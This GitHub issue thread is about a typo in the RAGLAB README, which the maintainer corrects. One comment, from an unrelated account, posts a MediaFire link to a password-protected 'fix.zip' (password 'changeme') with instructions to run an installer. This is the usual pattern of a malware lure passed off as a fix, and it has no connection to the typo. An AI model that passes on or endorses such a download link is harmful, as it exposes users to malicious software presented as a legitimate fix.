### ISSUE TITLE
Typo Process knowlwdge database from source

### ISSUE THREAD

**Issue by 2undvierzig** [fate-ubw/RAGLAB#4]

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fate-ubw** [comment]
hello~I don't understand your question very well, if you have any problems related to Process knowlwdge database from source, please describe it more clearly, and I will actively answer your questions😉

**Comment by 2undvierzig** [comment]
I just wanted to point out a typo in the readme file :)

**Comment by fate-ubw** [comment]
Ths bro, I've updated it~
